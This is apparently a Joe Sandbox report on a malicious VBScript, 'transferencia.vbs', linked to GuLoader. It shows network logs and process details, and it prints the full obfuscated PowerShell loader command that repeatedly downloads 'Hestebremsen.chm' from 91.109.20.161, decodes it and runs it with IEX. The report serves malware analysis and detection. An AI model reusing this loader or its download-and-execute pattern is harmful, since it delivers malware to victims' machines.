      http://91.109.20.161powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C628000.00000004.00000800.00020000.00000000.sdmpfalseunknown
      http://91.109.20.161(powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6EB000.00000004.00000800.00020000.00000000.sdmpfalse
        		unknown
        http://91.109.20.161/Hestebremsen.chmPpowershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmpfalse
          		unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmpfalseunknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          91.109.20.161
          		unknownGermany
          		28753LEASEWEB-DE-FRA-10DEfalse

          General Information

          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1524803
          Start date and time:2024-10-03 09:27:07 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 23s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:7
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:transferencia.vbs
          Detection:MAL
          Classification:mal88.expl.evad.winVBS@4/3@0/1
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 7
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .vbs

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target powershell.exe, PID 2448 because it is empty
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          03:28:01API Interceptor2982561x Sleep call for process: powershell.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          91.109.20.161Justificante_01102024.vbsGet hashmaliciousGuLoaderBrowse
          • 91.109.20.161/IHgddTBZm206.bin

          Domains

          No context

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          LEASEWEB-DE-FRA-10DEJustificante_01102024.vbsGet hashmaliciousGuLoaderBrowse
          • 91.109.20.161
          http://steam.csworkshoparts.com/filedetails/sharedfile/ak47-DeadRose/Get hashmaliciousHTMLPhisherBrowse
          • 5.61.42.53
          Https://25sep26ww.z13.web.core.windows.net/#Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
          • 217.20.112.104
          https://telegram-message-8n5.pages.dev/Get hashmaliciousUnknownBrowse
          • 217.20.112.104
          http://two.eagermint.comGet hashmaliciousUnknownBrowse
          • 217.20.112.104
          SecuriteInfo.com.Trojan.Inject5.8445.10776.26852.exeGet hashmaliciousUnknownBrowse
          • 37.1.196.35
          http://umjkitjtsk.top/crp/325gewfkj345Get hashmaliciousUnknownBrowse
          • 84.16.251.24
          5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
          • 178.162.203.226
          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
          • 178.162.203.226
          M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
          • 178.162.217.107

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):11608
          Entropy (8bit):4.890472898059848
          Encrypted:false
          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xlpl1eip.t5n.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Reputation:high, very likely benign file
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z2wew4ow.aev.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Reputation:high, very likely benign file
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          Static File Info

          General

          File type:ASCII text, with very long lines (360), with CRLF line terminators
          Entropy (8bit):4.859393766408919
          TrID:
            File name:transferencia.vbs
            File size:98'404 bytes
            MD5:c68010fc942eef8e8868e5d3197aadc8
            SHA1:964fa94fcbce9a5a0499672e881b271530c7e1fa
            SHA256:08b753161a621a8235016b94f3a8c68417a8907abda998f84a4de8687a515bf4
            SHA512:c0eaa3ea38af5bfebc3d37adaba0847fc607a45321583b368f218585d904efbf743519161fb2735bac84accee88fe0f5ff8c7683806864f5b005af98f25dbe3e
            SSDEEP:3072:7o7qCwl7ZyepmHmYYuNeE3L4jxrc78lUvywnM3:ghwtZyep5fsj7gxrcQlUKl
            TLSH:8AA34921EDD50A7B0E56079DBE110F56C4FDC6188226E8FCEADE171F504286CDBBE228
            File Content Preview:..Rem Smreostes! denaturisation festkldning186 emily wearisome;..Rem Sidst; opladende unintermission; skattemaessige untenaciousness..Rem Waterlander scandinavians: siamesers? farveinstallationsprogrammer, teratoscopy..Rem Omeletfyld. papercurrency: unvin

            File Icon

            Icon Hash:68d69b8f86ab9a86

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Oct 3, 2024 09:28:03.262187004 CEST4970480192.168.2.591.109.20.161
            Oct 3, 2024 09:28:03.268232107 CEST804970491.109.20.161192.168.2.5
            Oct 3, 2024 09:28:03.268374920 CEST4970480192.168.2.591.109.20.161
            Oct 3, 2024 09:28:03.268645048 CEST4970480192.168.2.591.109.20.161
            Oct 3, 2024 09:28:03.273367882 CEST804970491.109.20.161192.168.2.5
            Oct 3, 2024 09:28:24.651293993 CEST804970491.109.20.161192.168.2.5
            Oct 3, 2024 09:28:24.651550055 CEST4970480192.168.2.591.109.20.161
            Oct 3, 2024 09:28:24.715344906 CEST4970480192.168.2.591.109.20.161
            Oct 3, 2024 09:28:24.716185093 CEST4971280192.168.2.591.109.20.161
            Oct 3, 2024 09:28:24.720163107 CEST804970491.109.20.161192.168.2.5
            Oct 3, 2024 09:28:24.721652985 CEST804971291.109.20.161192.168.2.5
            Oct 3, 2024 09:28:24.721750021 CEST4971280192.168.2.591.109.20.161
            Oct 3, 2024 09:28:24.721880913 CEST4971280192.168.2.591.109.20.161
            Oct 3, 2024 09:28:24.726669073 CEST804971291.109.20.161192.168.2.5
            Oct 3, 2024 09:28:46.096348047 CEST804971291.109.20.161192.168.2.5
            Oct 3, 2024 09:28:46.099412918 CEST4971280192.168.2.591.109.20.161
            Oct 3, 2024 09:28:46.099445105 CEST4971280192.168.2.591.109.20.161
            Oct 3, 2024 09:28:46.106327057 CEST804971291.109.20.161192.168.2.5
            Oct 3, 2024 09:28:50.341593981 CEST4971380192.168.2.591.109.20.161
            Oct 3, 2024 09:28:50.346498966 CEST804971391.109.20.161192.168.2.5
            Oct 3, 2024 09:28:50.346630096 CEST4971380192.168.2.591.109.20.161
            Oct 3, 2024 09:28:50.346739054 CEST4971380192.168.2.591.109.20.161
            Oct 3, 2024 09:28:50.351963043 CEST804971391.109.20.161192.168.2.5
            Oct 3, 2024 09:29:11.745378971 CEST804971391.109.20.161192.168.2.5
            Oct 3, 2024 09:29:11.745575905 CEST4971380192.168.2.591.109.20.161
            Oct 3, 2024 09:29:11.745575905 CEST4971380192.168.2.591.109.20.161
            Oct 3, 2024 09:29:11.747419119 CEST4971580192.168.2.591.109.20.161
            Oct 3, 2024 09:29:11.750422001 CEST804971391.109.20.161192.168.2.5
            Oct 3, 2024 09:29:11.752345085 CEST804971591.109.20.161192.168.2.5
            Oct 3, 2024 09:29:11.752501011 CEST4971580192.168.2.591.109.20.161
            Oct 3, 2024 09:29:11.752549887 CEST4971580192.168.2.591.109.20.161
            Oct 3, 2024 09:29:11.757309914 CEST804971591.109.20.161192.168.2.5
            Oct 3, 2024 09:29:33.116991997 CEST804971591.109.20.161192.168.2.5
            Oct 3, 2024 09:29:33.119208097 CEST4971580192.168.2.591.109.20.161
            Oct 3, 2024 09:29:33.119390011 CEST4971580192.168.2.591.109.20.161
            Oct 3, 2024 09:29:33.124118090 CEST804971591.109.20.161192.168.2.5
            Oct 3, 2024 09:29:37.140057087 CEST4971680192.168.2.591.109.20.161
            Oct 3, 2024 09:29:37.145025015 CEST804971691.109.20.161192.168.2.5
            Oct 3, 2024 09:29:37.145159960 CEST4971680192.168.2.591.109.20.161
            Oct 3, 2024 09:29:37.145279884 CEST4971680192.168.2.591.109.20.161
            Oct 3, 2024 09:29:37.150068045 CEST804971691.109.20.161192.168.2.5
            Oct 3, 2024 09:29:58.537345886 CEST804971691.109.20.161192.168.2.5
            Oct 3, 2024 09:29:58.537643909 CEST4971680192.168.2.591.109.20.161
            Oct 3, 2024 09:29:58.537712097 CEST4971680192.168.2.591.109.20.161
            Oct 3, 2024 09:29:58.538088083 CEST4971780192.168.2.591.109.20.161
            Oct 3, 2024 09:29:58.548666000 CEST804971691.109.20.161192.168.2.5
            Oct 3, 2024 09:29:58.549035072 CEST804971791.109.20.161192.168.2.5
            Oct 3, 2024 09:29:58.552438974 CEST4971780192.168.2.591.109.20.161
            Oct 3, 2024 09:29:58.552620888 CEST4971780192.168.2.591.109.20.161
            Oct 3, 2024 09:29:58.557524920 CEST804971791.109.20.161192.168.2.5

            HTTP Request Dependency Graph

            • 91.109.20.161

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.54970491.109.20.161802448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            Oct 3, 2024 09:28:03.268645048 CEST173OUTGET /Hestebremsen.chm HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: 91.109.20.161
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.54971291.109.20.161802448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            Oct 3, 2024 09:28:24.721880913 CEST173OUTGET /Hestebremsen.chm HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: 91.109.20.161
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.54971391.109.20.161802448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            Oct 3, 2024 09:28:50.346739054 CEST79OUTGET /Hestebremsen.chm HTTP/1.1
            Host: 91.109.20.161
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.54971591.109.20.161802448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            Oct 3, 2024 09:29:11.752549887 CEST79OUTGET /Hestebremsen.chm HTTP/1.1
            Host: 91.109.20.161
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.54971691.109.20.161802448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            Oct 3, 2024 09:29:37.145279884 CEST79OUTGET /Hestebremsen.chm HTTP/1.1
            Host: 91.109.20.161
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.54971791.109.20.161802448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            Oct 3, 2024 09:29:58.552620888 CEST79OUTGET /Hestebremsen.chm HTTP/1.1
            Host: 91.109.20.161
            Connection: Keep-Alive


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:03:27:56
            Start date:03/10/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs"
            Imagebase:0x7ff687340000
            File size:170'496 bytes
            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:2
            Start time:03:27:58
            Start date:03/10/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=,pfa$BitsPVibroLutessquatUbemnKalpa TerrAntiiFde,s Marn chieD gtrF.shtGeraiAnatoO.twnFr k2Komp5se i4 M l ');$Appartementerne=Opbrugets52 'Fdev$IndhG StorBedruUnliiFl,rn andeEpip.PaalDBengoSeiswPiannG unlskruoTo oaGlu,dlittF rii dsslRecaeStri(Mas $Inf USnevg dlneswamnpromu erdmUnstm S,jeNederdiss,Smir$EsteH andeJohaaTestdUnr wTravaPy al Va,lanaps ko ) O i ';$Headwalls=$Indkopiering;ggepuncherne (Opbrugets52 'kate$Dag,G araLEkseOGr.nBglacAF.rbLarbi:D nsSUndeANohoNMeteEsa.trBasiiBiffNRandGStums .hapCou L AceAAandnSkriSLike=Nons(OverT Pr eBesvs emotDd a-Fa.sper oaPrecTUn eh,ota Supp$Ud kh PloEEtheA Unidtragw unkAGypplGenfLNav sDann)Fecu ');while (!$Saneringsplans) {ggepuncherne (Opbrugets52 'Sati$ProcgMothlTyveo Preb ,usaHnislOdou:A orSR alopri,rEvo.t DehbEndorInt s Usmgsp cr CoroDisms S esPac.e ndrAngeeMetrrReineP,einhira=Snif$My lt JonrSammuE tue No, ') ;ggepuncherne $Appartementerne;ggepuncherne (Opbrugets52 'CuncSFrdstUdvialovbr.avtt S.i-BekoSPolylNonie UdleNapopArve Ribi4Kemi ');ggepuncherne (Opbrugets52 'a ro$MispgModslPlano dseb rka Bufl li: .ntSchina SagnSnapeGelar FreiSlgenKassgSides Filp verlTranaDok,n Slas Gla= S,a( FaaT.itueT ess olet lop-PantPb siaTorstPrush F k Pede$D,ffHSacce DisaAnild S,iwSl,vaAntilInfelPainsIm.r)Unlo ') ;ggepuncherne (Opbrugets52 ' Oc $MoelgdknilmarroUnpob BaraIn,llHark:StadIcymonRverd AntbBenvyshe.gBry nDowniSy,snKri,g v nsUnsakC ula,nclsTracs DupeRail=Form$ kilg Jorl epoo GenbTan aTromlPent:BeklORebsp laybFlledTaale ProsS at+Prsi+ Rus%Psyc$G afS Ko aJibblC.emaSvanmForna inn TriduncarAarvi Be nF lle La . recBonhoTel uK ntn.inet Con ') ;$Ugenummer=$Salamandrine[$Indbygningskasse];}$Vertikalernes=278564;$Binokular=29796;ggepuncherne (Opbrugets52 'Tung$Lkkeg SimlK tkoEnt b AdhaDis lRoni:VemoA.appbEnkesDybvt acrSan,uGasosOpkaiAntioUvrdnSkot T.l= at SkilG trae TrotRigs-OverCSp aoStadnWorktS.mmeOf in A tt Or. Ubev$ AfsHOcl.e s aaGhendEs awe spaRec lPer lKrtesA.at ');ggepuncherne (Opbrugets52 'Ind $AlkygTr clHopio DesbAlfaaM milXene:SexaPKrlir sl,oloantC leo KnarItattStonhTop,oMgl pToa.tLatee.yperd siaDisl Par = ebu Evan[Rer,S locyDeodsP rytUn ee Do.m ume.subiCInveo YaknRensvPendedeborAf mtPara]Rest:P,ak: WhiFUnrerOtheoBa,omToneBDes aJun sA emeDe,e6u pr4 retSSkoltBrisrKrokiChapnNe tgLan (Klft$ ,piATaulbStoks R.mt s vrTryku EqusPas iAktioHyponUfat) K a ');ggepuncherne (Opbrugets52 'Mine$ungrgArbelWelso Makb Ro apibelCont: ucuJFyrseUng.sKoras Pr.iJudicRin,aMiso Sag.=G ff Swoo[snotSSl.syGenks NontPreleCon,m Sp,. homTUltreSydhxDelrtTall.RadiE Astn nducUretoStdtdu jliSamdnSalggArge] Ra :Amus:FornAConuSSoulCGlggIAfhaITiss.TanyGNonreTj etUnc SEnketG eerKvkkiSermnsupegKami( Iow$MiliPpreir CafoUn htI dso DrirKapitCodhhSammoundepAdsttGryne VrarIsola Tea)S,ri ');ggepuncherne (Opbrugets52 'Fors$Fi agK lkl H.loPlebb UnsaOmr lMo.e:MameU ParnSletitalanBelljExtruRe srInt,iUdtao D.nuUnfes Bol=Torm$AsymJZeu eFinlsUkams Z.ai Sevc SupaMame. GstsVse.uPeppbtkkesZephtAmenrArali DsrnMet g Per(Mark$Ma.aVA oueD,asr ertVandi SeakArbeaUsdel F re T,krLegansc teV risTil ,Fr,e$g.ntBMajoi Fonn WoooParakDannuChlolReina,lasrGrs )Geot ');ggepuncherne $Uninjurious;"
            Imagebase:0x7ff7be880000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:3
            Start time:03:27:58
            Start date:03/10/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6d64d0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Disassembly

            Reset < >

              Executed Functions

              Function 00007FF848DB5415 Relevance: .5, Instructions: 521COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000002.00000002.3352113947.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 516bd4c25b958d5aca39cee655b829eab6d3863db8b659ccd1f536c8d8a36a83
              • Instruction ID: 3bea4199bbc7d5c7b84ad11e4cefd66f177330a9c9deeeaa3f6cec4723ac2a86
              • Opcode Fuzzy Hash: 516bd4c25b958d5aca39cee655b829eab6d3863db8b659ccd1f536c8d8a36a83
              • Instruction Fuzzy Hash: D3F1C130A1DA498FDB88EF18C455AA97BF1FF69350F1441AAD409D7296CB34E886CB81
              Function 00007FF848E8713A Relevance: .4, Instructions: 436COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000002.00000002.3353105237.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a76941b2994de1c05338e7337bf7163e89148a123fe57723cda80d50fa8833f5
              • Instruction ID: 90819d5b0e835eba19ee02e950d43df29b7595f8d0c965d317156546e42b5995
              • Opcode Fuzzy Hash: a76941b2994de1c05338e7337bf7163e89148a123fe57723cda80d50fa8833f5
              • Instruction Fuzzy Hash: B4D15431D0EA8A5FEB95EB295C145B97BE0FF56390F4800FAD44DC7193DB28A8018356
              Function 00007FF848E84689 Relevance: .4, Instructions: 357COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000002.00000002.3353105237.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 414aedd69674d9db6361fe5bd81dbc6ae0e648d005f3a14f11d16e0f15909419
              • Instruction ID: 985542a7adbb120ac7f6fcb3178032f910a28f06467e31e5e4f8874cf66dbeb3
              • Opcode Fuzzy Hash: 414aedd69674d9db6361fe5bd81dbc6ae0e648d005f3a14f11d16e0f15909419
              • Instruction Fuzzy Hash: 0FA11732E0DE864FE7A9A62C581567877D1FF96398F8801BAD40DC31D3DF29AC01835A
              Function 00007FF848E84814 Relevance: .1, Instructions: 97COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000002.00000002.3353105237.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dbf47246b0cf78ab5fd02455665b0e9cf344f311953430fca63a28a6335beb44
              • Instruction ID: a64617a018660db0cc49cc84a35d88216d3d4ab801b9262f4a8957dc7b2e8e57
              • Opcode Fuzzy Hash: dbf47246b0cf78ab5fd02455665b0e9cf344f311953430fca63a28a6335beb44
              • Instruction Fuzzy Hash: 6721F831E1EEC64FF3A5A628145527866D2FF51398FC800BAE00DC31D3DF289C05830A
              Function 00007FF848E819AF Relevance: .1, Instructions: 80COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000002.00000002.3353105237.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 811bcd3a3e723f9fbdc4e7907ca338dc27b70d86625b482c60a4342b235f2186
              • Instruction ID: d46a2c5d21f86584db34e0995274f331e37ae35bd9668aa30314a9bcf2832b04
              • Opcode Fuzzy Hash: 811bcd3a3e723f9fbdc4e7907ca338dc27b70d86625b482c60a4342b235f2186
              • Instruction Fuzzy Hash: 6B210462E0EAC55FF395A23C68151786AD1FF56A90F4945FAC04DC71E3DD2C8C4A8326
              Function 00007FF848E849B2 Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
